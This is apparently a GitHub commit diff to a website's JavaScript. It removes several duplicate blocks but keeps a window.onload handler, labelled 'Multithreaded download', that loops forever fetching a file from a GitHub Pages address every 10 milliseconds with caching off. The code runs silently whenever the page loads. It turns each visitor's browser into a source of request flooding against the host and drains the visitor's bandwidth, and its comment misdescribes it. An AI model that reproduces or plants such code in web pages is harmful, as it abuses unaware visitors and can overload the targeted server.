This commit is contained in:
Boof 2023-01-18 13:18:31 +01:00 committed by GitHub
parent 0419f5b51f
commit 6f19503b92
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -35,26 +35,13 @@ if(resppage = true){
}
}
//Multithreaded download
window.onload = async function startdown(){
while(true) {
await delay(10);
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
}
}
window.onload = async function startdown(){
while(true) {
await delay(10);
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
}
}
window.onload = async function startdown(){
while(true) {
await delay(10);
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
}
}
window.onload = async function startdown(){
window.onload = async function startdown2(){
while(true) {
await delay(10);
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})